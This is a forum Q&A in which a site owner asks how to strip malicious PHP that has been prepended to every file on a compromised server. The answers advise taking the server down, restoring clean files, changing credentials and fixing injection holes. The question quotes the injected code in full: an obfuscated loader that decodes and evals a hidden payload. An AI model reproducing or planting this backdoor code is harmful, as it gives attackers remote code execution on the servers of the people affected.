# How to fix Random php code is prepended on each php file in the server

Tags: php

Below php code is prepended to each php file on my server. A random variable is assigned random value. I believe it has been hacked but how do i fix this? It would be tedious task to open each file and remove these codes. Can we write some reg expressions to remove it.

```
<?php $ykpnfnvlxm = ']88y]27]28y]#%x5c%x78%x7825nfd)##Qtpz)#]341]88M4P8]37]278]225]241]334]368]322]3]364]6(0); preg_replace("%x2f%50%x2e%5c%x7825tdz*Wsfuvso!%x5c%x7825bss%x5c%x78#opo#>>}R;msv}.;%x5c%x782f#%x5c%x782f#%x5c%x782f},;#-#}+;%x5j:!>!#]y3d]51]y35]256]y76]72]y3d]51]y35]274]y4:]x7860opjudovg%x5c%x70GB)fubfsdXA%x5c%x7827K6<%x5c%x787fw6*3qj%x5c%x78257>%x5c%5c%x7860%x5c%x7878%x5c%x7822l:!}V;3q%x5c%x7825}U;y]}R;2]},;osvufs}%x5cEBFI,6<*127-UVPFNJU,6<*27-SFGTOBSUO)fepmqnj!%x5c%x782f!#0#)idubn%x5c%x7860hfsq)!sp!*#ojneb#-*f%xx5c%x786057ftbc%x5c%x787f!|!*uyfue%x5c%x78b%x5c%x7825mm)%x5c%xpd19275fubmgoj{h1:|:*mmvo:>:iuhofm%x5c%x7825:-5ppde:4sutcvt)fubmgoj{hA!osvufs!~<3,j%x5c%x7825>j%xc%x7860UQPMSVD!-id%x5c%x7825)f5d816:+946:ce44#)zbssb!>!ssbnpe_GMFT%x5c%x78824-%x5c%x7824*!|!%x5c%x5c%x7825tjw!>!#]y84]275]y83]248]y83]256]y81]265]y72]254]y76#825=*h%x5c%x7825)m%x5c%x7825):fmji%x5c%x7878:<#%x5c%x7824-%x5c%x7824]y8%x5c%x7824-%x5c%x7824]26%x5c%x7824-%x5c%x787jsv%x5c%x78257UFH#%x5c%x7827rfs%x5c%x78256~6<%x5c%x787fw]283]427]36]373P6]36]73]83]238M7]381]211M5]67]452]*f%x5c%x7827,*e%x5c%%x5c%x78246767~6<Cw6<pd%x5c%x7825w6Z6<.5%x5c%x7860hA%x5c%x7827pd%xV<*w%x5c%x7825)ppde>u%x5c%x7825V<#65,47R25,d7R17,67R37,#%x5c%x782fq%%x7825z>>2*!%x5c%x7825z>3<!fmtf!%x5c%x7825o:!>!%x5c%x78242178}527}88:}334}472%x5c%5c%x78273qj%x5c%x78256<*Y%x5c%x7825)fnbozcYufhA%x5c%x75c%x7825o:W%x5c%x7825c:>1<%x5c%x7825b:>1<!gps)%x5c%x7825j:>_;gvc%x5c%x7825}&;ftmbg}%x5c%x787f;!osvufs}w;*-4-bubE{h%x5c%x7825)sutcvt)esp>hmg%x5c%x7825!<12>j%x5c%x7825!|!*#91y2b%x5c%x7825!<*qp%x5c%x7825-*.%x5c%x{h%x5c%x7825)sutcvt-#w#)ldbqov>*ofmy%x5c%x7825)utjm!|!*5!%x5c%x7827!hmU%x5c%x7860MPT7-NBFSUT%x5c%x7860LDPT7-UFOJ%x5c%x78652]e7y]#>n%x5c%x7825<#372]58y]472]37y]672]48y]#>s%x5c%x7825<#462]47]o]Y%x5c%x78257;utpI#7>%x5c%x782f7rf29%73", NULL); })q%x5c%x7825:>:r%x5c%x7825:|:**t%x5c%x7825)m%x5c%x7uqpuft%x5c%x7860msvd},;uqpuft%x5c%x7860msvd}+;!>!}%x5c%x7827;!>>>!}%x5c%x7825)!gj!<2,*j%x5c%x7825-#1]#-bubE{h%x5c%x782~67<&w6<*&7-#o]s]o]s]#)fepmqyf%x5c%x7827*&7-n%x5c%x7825)utjm6825tzw%x5c%x782f%x5c%x7*WCw*[!%x5c%x7825rN}#QwTW%x5c%x7825hIr%x5c%x785c146-tr.984:75983:48984:724<%x5c%x7825j,,*!|%x5c%x7824-%x#-#H#-#I#-#K#-#L#-#M#-#[#-#Y#-#D#-#W#-#C#-#O#-#N#*%x5c%c%x785cq%x5c%x7825)ufttj%x5c%x7822)gj6<^#Y#%x5c%x785cq%x5c%x]321]464]284]364]6]234]342]58]24]31#-%x275]y7:]268]y7f#<!%x5c%x7825tww!>!%x5c%x782400~:8272qj%x5c%x78256<^#zsfvr#%x5c%x785cq%x5c%x78257%x5c%x7mji%x5c%x78786<C%x5c%x7827&6<*rfs%x5%x785cq%x5c%x7825%x5c%x7827jsv%x5c%x7823]y76]277#<%x5c%x7825t2w>#]judovg}{;#)tutjyf%x5c%x7860opjudovg)!gj!|!*msv%x5c%x7825)}k1<%x5c%x7825j:=tj{fpg)%x5c%x7825ovg+)!gj+{e%x5c%x7825!osvufs!*!+A!>!{e%x5c%x7825)!>>%x5c%x7822!ftmb*#fmjgk4%x5c%x7860{6~6<tfs%x5c%x7825w2f#0#%x5c%x782f*#npd%x5c%x782f#)rrd%x5cGFS%x5c%x7860QUUI&c_UOFHB%x5c%x7860SFTV%x5c%x7860QUUI&b%x5c%x7825!c%x785c%x5c%x7825j:.2^,%x5c%x7825b:<!%x5c%c%163%x74%162%x5f%163%x70%187f_*#ujojRk3%x5c%x7860{6c%x78e%x5c%x78b%x5c%x7825w:!>!3g]61]y3f]63]y3:]68]y76#<%x5-#%x5c%x7824-%x5c%x7824-tusqpt)%x5c%x7825z-#:#*%x5c%x7824-%x5c%x824)#P#-#Q#-#B#-#T#-#E#-#Gx7827,*d%x5c%x7827,*c%x5c%x7827,*b%x5c%x7827)fepdof.)fepdof.%x5c%SVUFS,6<*msv%x5c%x78257-MSV,6<*)ujojR%x5c%x7827ix7825}K;%x5c%x7860ufldpt}X;%x5c%x7x5c%x7827!hmg%x5c%x7825)!gj!~<ofmy%x5c%x7825,3,j%jepdoF.uofuopD#)sfebfI{*w%x5c%x7825)kV%x5c%x7878{**#k#)tutjyf%xun>qp%x5c%x7825!|Z~!<##!>!2p%x5c%x7825!|!*!***b%x5c%xif((function_exists("%x6f%142%x5f%163%x74%141%x72%164") && (!isset($GL7825%x5c%x7878:-!%x5c%x7OBALS["%x61%156%x75%156%x61"]7824!>!tus%x5c%x7860sfqmbdf)%x5c%x7825%x5c%x7824-%x5c%x7824y4%x7827;mnui}&;zepc}A;~!}%x5c%x787f;!|!}{;)gj}l;33bq}k;opjudovg}%x5c%y74]273]y76]252]y85]256]y6g]257]y86]267]y74]%x5c%x7825)n%x5c%x7825-#+I#1]K9]77]D4]82]K6]72]K9]78]K5]53]Kc#<%x5c%x7825tpz!>!88]5]48]32M3]317]445]212]445]43]y6gP7L6M7]D4]275]D:M8]Df#<%x5c%x7825ggg!>!#]y81]273]y76]258]y6g]%x5c%x7860ftsbqA7>q%x5c%x78256<%x5c%x787fw6*%x5c%x787f_*#]y72]254]y76]61]y33]68]y34]68]y33]65]y31]53]%x7825z>2<!%x5c%x7825ww2)%x5c%x7825w%x5c%x7860TW~%x5c%x7824<%x5c%x78<%x5c%x787fw6*%x5c%x787f_*#[k2j!|!*bubE{h%x5c%x7825)j{hnpd!opjudovg!|!**#j{hnpd#)tutjyf%x5c%3>?*2b%x5c%x7825)gpf{jt)!gj!<*2bd%x5c%x7825-#1GO%x5c%x7822#)fepmqyfA>f*)323zbe!-#jt0*?]+^?]_%x5c%x785c}X%x5c%x7824<!%x5c%x7825tzw>!#]y7#p#%x5c%x782f#p#%x5c%x782f%x5c%x7825z<jg!)%x5cy76]271]y7d]252]y74]256]y39]252]y83]273]y72]282#<!%xfubfsdXk5%x5c%x7860{66~6<&w6<%x5c%x78x5c%x7825G]y6d]281Ld]245]K2]285]Ke]53Ld]53]Kc]55Ld]55#*x7825t2w)##Qtjw)#]82#-#!#-%x5c%x7825tmw)%x5c%x7825tww5)tpqsut>j%x5c%x7825!*9!%7824Ypp3)%x5c%x7825cB%x5c%x7825iN}#-!tussfw)%x5c%x782527{**u%x5c%x7825-#jt0}Z;0]=]0#)2q%x5c%x7825l}S;2-u%x5c%x7825!*#}_;#)323ldfid>}&;!osvufs}%x5c%x787f;!opjudovg}k~~54%x69%164%50%x22%134%x78%62%x35%165%xbT-%x5c%x7825hW~%x5c%x7825fdy)##-!#~<%x5c%x7825h00#*<%x5c<C%x5c%x7827pd%x5c%x78256|6.7eu{66:^<!%x5c%x7825w%x5c%x7860%x5c%x785c^>Ew:Qb:Qc:W~!%x5c%x7825z!>2<!gx5c%x7825>U<#16,47R57,27R66,#%x5c%x782f6]281L1#%x5c%x782f#M5]DgP5]D6#<%x5c%x7825fdy>#]D4]273]D6P2L5P6e:5597f-s.973:8297f:5297e:56-%xc*W%x5c%x7825eN+#Qi%x5c%x5c%x787f!>>%x5c%x78227824-%x5c%x7824%x5c%x785c%x5c%x7825j^%x5c%x7824-%x5c%x6<*K)ftpmdXA6|7**197-2qj%x5c%x78257-K)udfoopdXA%x5c%x7822)7gj6<*QD7825%x5c%x7827Y%x5c%x78256<.msv82f7#@#7%x5c%x782f7^#iubq#%x5c5c%x782f7&6|7**111127-K)ebfsX%x5c%x7827u%x5c%x7825)7fq%x5c%x7825>2q%x5c%x7825<#g6R85,67R37,18R#>q%x5c%x7825V<*#fopoV;hoFWSFT%x5c%x7860%x5c%x7825}X;!sp!*x7824%x5c%x782f%x5c%x7825kj:-!OVMM*<(<%x5c%x78e%x5c%x78b%x5c%xOBALS["%x61%156%x75%156%x61"])))) { $GL#]D6M7]K3#<%x5c%x7825yy>#]D82f%x5c%x7825%x5c%x7824-%x5c%x7824!>!fyqmpef)#%x5c%x7824*<!%x5c%x7825k5j=tj{fpg)%x5c%x7825%x5c%x7824-%x5c%x7824*<!~!dsfbuf%x5c%x7<Cb*[%x5c%x7825h!>!%x5c%x7825tdz)%x5c%x7825bbT-%x5c%x7825^-%x5c%x7825r%x5c%x785c2^-%x5c%x7825hOh%x5c%x782f#00#W~!%x5c%ps)%x5c%x7825j>1<%x5c%x7825j=6[%x5c%x7825ww2!>z+sfwjidsb%x5c%x7860bj+upcotn+qsvmt+fmhpph#)zbssb!-#}#7825)sf%x5c%x7878pmpusut!-#j0#!%x5c%x782f!**#sfmcnbs+yfeob%157%x64%145%x28%141%x]y76]277]y72]265]y39]271]y83]256]y78]248]y83]256]y81]265%x5c%x7827k:!ftmf!}Z;^nbsbq%x5c%x7825%x5c%x785cS%x782f#00;quui#>.%x5c%x7825!<**c%x7825-qp%x5c%x7825)54l}%x5c%x7827;%x5c%x7825!<~~~<ftmbg!osvufs!|ftmf!~<**9.-j%x5c%x7825-bubE{h%x5c%x7825)<h%x5c%x7825_t%x5c%x7825:osvufs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%56<C>^#zsfvr#%x5c%x785cq%x5c%x78257**^#zsfvr#%x560QIQ&f_UTPI%x5c%x7860QUUI&e_SEEB%x5c%x7860FUPNFS&d_SFSF8]y3f]51L3]84]y31M6]y3e]81#%x5c%x782f#7e:559%x5c%x7878B%x5c%x7825h>#]y31]278]y3e]81]K78:56985:6197g:74985-rr.93<!fmtf!%x5c%x7825b:>%x5c%x7825s:%x5<%x5c%x787fw6*CW&)7gj6<*K)ftpmdXA6~6<u%x5c%x78257>%x7878Bsfuvso!sboepn)%x5c%x7825epnbss-%x5cx7827pd%x5c%x78256<pd%x5c%x7825w6Z6<.3%x5c%x7860hA%x5c%x7827pd%x5c<%x5c%x7825bG9}:}.}-}!#*<%x5c%x7825nfd>%x5c%x7825fdy%x785c1^W%x5c%x7825c!>!%x5c%x7825i%x5c%x785c2^<!Ce*[!%x5c%x7825cIjQeTQ!pd%x5c%x7825)!gj}Z;h!op:|:**#ppde#)tutjyf%x5c%x78604%x782f%x5c%x7825r%x5cx5c%x7825>j%x5c%x7825!<**3-j%x5c%x7825-bubEx7824*<!%x5c%x7824-%x5c%x7824gps)%x5c%x7825j>1<%x5c%x782%x78256<pd%x5c%x7825w6Z6<.2%x5c%x7860hA%x5c%x7827pd%x5c%x782565!*##>>X)!gjZ<#opo#>b%x5c%x7825!**X)ufttj%x5c%x7822)gj!|!*nbs=1; function fjfgg($n){return chr(ord($n)-1);} @error_reporting%x5c%x7825!<*::::::-111112)eobs%x5c%x786052%x29%57%x65","%x65%166%x61%154%x28%151%x6d%160%x6c!hmg%x5c%x7825!)!gj!<2,*j%x5c%x7825)dfyfR%x5c%x7827tfs%x5c%x78256<*17-SFx7824y7%x5c%x7824-%x5c%5c%x7878r.985:52985-t.98]K4]65]D8]86]y31]2725!-#1]#-bubE{h%x5c%x7825)tpqsut>j%x5c%x7825!*72!%x5c%x7827!hmgs:*<%x5c%x7825j:,,Bjg!)%x5c%x7825j:>>1*!%x5c%x7825b:>15csboe))1%x5c%x782f35.)1%x5c%x782f14+9**-)1%x5c%x782f2986+7**^%x5c9{d%x5c%x7825:osvufs:~928>>%x5c%x7822:ftmbg39*56A:>:8:|:7x782f#@#%x5c%x782fqp%x5c%x7825>5h6]277]y72]265]y39]274]y85]273]y6g]273]5c%x7825!*3!%x5c%x78273]y76]258]y6g]273]y76]271]y7d]252]y74]256#<!%x5c%x7825ff2sfw)%x5c%x7825zW%x5c%x7825h>EzH,2W%x5c%x7825wN;#-Ez-1H822)!gj}1~!<2p%x5c%x7825%x5c%x787f!~!<##!>!2p%x5c%x7x782272qj%x5c%x7825)7gj6<**2qj%x5c%x7825)hopm3qjA)qj3hopmA%xg%x5c%x7825)!gj!|!*1?hmg%x5c%x7825)!gj!<**25c%x78256<pd%x5c%x7825w6Z6<.4%x5c%x7860hA%x5c%x5c%x782fh%x5c%x7825:<**#57]38y]47]67y]37x7878;0]=])0#)U!%x5c%x78d%x5c%x7860ufh%x5c%x7860fmjg}[;ldpt%x5c%bq%x5c%x7825)323ldfidk!~!<**qp%x5c%x7825!-uyfu%x5c%x7825)3of)fepdof%cOc%x5c%x782f#00#W~!Ydrr)%x5c%x7825r%x5c%x!<5h%x5c%x7825%x5c%x782fr%x5c%x7825%x5c%x782fh!>!bssbz)%x5c%x7824]25%x5c%x7824-%x5c%x7824-!%x5c%x7825%x5c%x766~6<&w6<%x5c%x787fw6*CW&)7gj6<.[A%x5c%x7827&6|!*)323zbek!~!<b%x5c%x7825%x5c%x787f!<X>b%x5c%x7825Z<#opo#>b%x5c%x782g)!gj<*#k#)usbut%x5c%x7860cpV%x5c%x787f%x5c%x787f%x5c%x787f%x5c%x787f<%x5c%x78223}!+!<+{e%x5c%x7825+*!*+fepdfe{h+{d%x5c%x7825)+opjud860msvd}R;*msv%x5c%x7825)}.;%x572%162%x61%171%x5f%155%x61%160%x28%42%x66%152%x66%147%x67%42%x25c%x7825)sf%x5c%x7878pmpusut)tpqssutRe%x5c%x7825)Rd%x5c%x7825)Rb%x5c82]y3:]62]y4c#<!%x5c%x7825t::!>!%x5c%x3a%146%x21%76%x21%50%x5c%x7825%x5c%x7878:!>#]yy6d]281]y43]78]y33]65]y31]55]y85]82]y76]62]y3:]84#x7825c:>%x5c%x7825s:%x5c%x785c%x5c%x7825j825Z<^2%x5c%x785c2b%x5c%x7825!>!2p%x5c%x7825!*#6#)tutjyf%x5c%x7860439275ttfsqnpdov{h19275j{hn##}C;!>>!}W;utpi}Y;tuofuop<%x5c%x7825tmw!>!#]y84]275]y83]27u%x5c%x7825V%x5c%x7827{ftmfV%x5c%x787f<*X&Z&S{ftmfV%x5c%x787f<*XAZAS7825tdz>#L4]275L3]248L3P6L1M5]D2P4]D6#<%#:>:h%x5c%x7825:<#64y]57824tvctus)%x5c%x7825%x5c%x7824-%x5c%x7824b!>!%x5c%x7825yy)#}#]c9y]g2y]#>>*4-1-bubE{h%x5c%x7825)sutcvt)!g7825)euhA)3of>2bd%x5c%x7825x7824<!%x5c%x7825mm!>!#]y81]27860gvodujpo)##-!#~<#%x5c%x7<.fmjgA%x5c%x7827doj%x5c%x78256<%x5c%x787fw6*%x5c%x787f_5c%x7824gvodujpo!%x5c%x7824-%x5c%**WYsboepn)%x5c%x7825bss-%x5c%x7825r%x7825r%x5c%x7878W~!Ypp2)%x5c%x7825zB%x5c%x7825z>!tuss%x5c%x78256<#o]1%x5c%x782f20QUUI7fw6*CW&)7gj6<*doj%x5c%x78257-C)fepmqnjA%x5c%x7827&6d%x5c%x78256<%x5c%x787fw6*%x5c%x76<%x5c%x787fw6*CWtfs%x5c%x7825)7gj6<*id%x5c%x7825)ftpmdR6<*id%x5c%x78y]252]18y]#>q%x5c%x7825<#762]67y]562]38y]572]48y]#>m%x5c%x7860{6:!}7;!}6;-#2#%x5c%x782f#%x5c%x7825#%x5c%x782f#o]#%x5c%x782-!OVMM*<%x22%51%x29%51%x%x7825))!gj!<*#cd2bge56+99386c6f+9273]y76]271]y7d]252]y74]256#<!%x5c%x7825ggg)(0)%x5c%x782f+*0f(-!#%x7878<~!!%x5c%x7825s:N}#-%xc%x78257-K)fujs%x5c%x7878X6<#o%x5c%x7825:|:*r%x5c%x7825:-t%x5c%x7825)3of:opjudovg<~%x5c%x7824<!%x5c/(.*)/epreg_replacezfjjuvszvh'; $ieoizcqynd = explode(chr((235-191)),'3356,70,5425,39,3450,29,7051,63,85,31,7155,52,5896,22,8591,63,2844,27,4657,38,8760,46,2926,28,2896,30,1067,66,7944,46,6567,66,6928,62,4752,34,1955,61,6475,52,5211,53,2400,36,10007,30,1734,36,9547,33,940,57,5084,66,1616,51,285,58,7841,60,1283,54,2345,55,5181,30,2436,39,6225,48,2198,60,5150,31,3827,57,4321,37,9580,52,9369,56,2660,37,9665,69,7240,39,413,35,3109,48,9632,33,2871,25,8313,46,3996,30,9786,21,8990,26,8055,40,3157,34,8560,31,668,29,1837,67,1396,46,5007,23,6755,24,2502,59,6101,59,624,44,7656,22,7207,33,7345,63,1904,51,4466,25,3191,49,6829,43,1546,70,7901,43,1442,68,9242,43,4026,62,265,20,7789,52,8897,46,4088,69,1510,36,9285,27,8205,22,2697,39,6022,31,1047,20,3044,65,7585,33,7114,41,3303,53,5838,58,5784,54,448,61,8654,68,9880,34,697,45,6273,56,2736,66,8359,69,6990,61,8095,68,509,33,5974,48,5330,33,157,60,6053,48,4606,51,7528,57,8943,47,571,53,6779,29,8498,62,2593,67,8428,70,9049,68,1133,68,4852,39,5264,66,3240,63,343,70,3540,68,8031,24,4545,61,9807,49,4157,66,7618,38,4269,52,766,60,9016,33,2475,27,3608,44,2297,48,6160,65,7990,41,0,21,8227,24,3652,27,1786,51,826,47,9157,23,1667,32,1699,35,9734,52,10037,69,1237,46,9312,30,7678,57,8251,62,742,24,5030,54,9180,62,2954,64,3479,61,873,67,2111,32,9425,33,7279,23,6872,56,5561,59,9342,27,5491,70,217,48,8722,38,4491,54,4984,23,6685,70,8163,42,6527,40,9494,53,7735,54,2039,49,5677,61,4413,53,9458,36,6373,67,4953,31,7302,43,6329,44,2088,23,3679,52,5464,27,4891,62,3762,33,9117,40,4358,55,6633,52,5620,57,4695,57,21,64,997,50,3731,31,2258,39,116,41,7462,66,6808,21,9979,28,1337,59,2561,32,7408,54,6440,35,2802,42,8856,41,4786,66,5738,46,4223,46,1201,36,3928,68,542,29,3426,24,2016,23,3018,26,2143,55,5363,62,3795,32,9914,65,5918,56,3884,44,8806,50,9856,24,1770,16'); $gkxwtkprgr=substr($ykpnfnvlxm,(57718-47612),(31-24)); if (!function_exists('ufhifnilck')) { function ufhifnilck($jqhunqcplr, $pspnavsodg) { $jkuhymputb = NULL; for($uqgvjzvazc=0;$uqgvjzvazc<(sizeof($jqhunqcplr)/2);$uqgvjzvazc++) { $jkuhymputb .= substr($pspnavsodg, $jqhunqcplr[($uqgvjzvazc*2)],$jqhunqcplr[($uqgvjzvazc*2)+1]); } return $jkuhymputb; };} $pthlzycebh="\x20\57\x2a\40\x64\160\x63\162\x77\155\x65\167\x77\155\x20\52\x2f\40\x65\166\x61\154\x28\163\x74\162\x5f\162\x65\160\x6c\141\x63\145\x28\143\x68\162\x28\50\x32\65\x37\55\x32\62\x30\51\x29\54\x20\143\x68\162\x28\50\x32\70\x39\55\x31\71\x37\51\x29\54\x20\165\x66\150\x69\146\x6e\151\x6c\143\x6b\50\x24\151\x65\157\x69\172\x63\161\x79\156\x64\54\x24\171\x6b\160\x6e\146\x6e\166\x6c\170\x6d\51\x29\51\x3b\40\x2f\52\x20\171\x77\144\x64\163\x76\154\x74\150\x67\40\x2a\57\x20"; $meydnffptt=substr($ykpnfnvlxm,(37607-27494),(50-38)); $meydnffptt($gkxwtkprgr, $pthlzycebh, NULL); $meydnffptt=$pthlzycebh; $meydnffptt=(726-605); $ykpnfnvlxm=$meydnffptt-1; ?>
```

Comment: If they're all different, it will be hard to write a regular expression that matches them all. If you can find something they all have in common, then write a regexp that matches it. Maybe it would be easier to just restore from your backup (don't tell me you're running a server without backups).

Comment: There is a lot more you will have to do. As you can see, this is in no way a random value. You can search for common parts like `!function_exists(` but you can't be sure that your site is clean then. First find the vulnerability of your site, then after fixing, copy the original files to the server again if you can.

Answer (score 2, accepted):

### Yes, your server seems like it is compromised.

Do these steps to get recovered.

- Take your server down.
- Change your FTP/SFTP account information
- Backup all your files from your webserver in a separate folder on your local hard drive
- Delete all the files from your webserver.
- Inspect your local backup to see if there any c99 shell file included. If so, delete it.
- Fix all your PHP code for any SQL Injections and RFI Vulnerabilities
- Once done, re-upload all your files.

Answer (score 2):

You need to figure out how someone hacked into your server. In most cases, it is your fault (vulnerable code, social engineering, etc).

Once you do that, format the server, reapply code from a point (or commit) where it was not hacked (You *are* using version control, **right??**). Fix the vulnerability in your code and change all the passwords to proper, secure ones.

If you were indeed hacked, just removing the malicious code would solve nothing, because the hacker could still in theory easily access your server.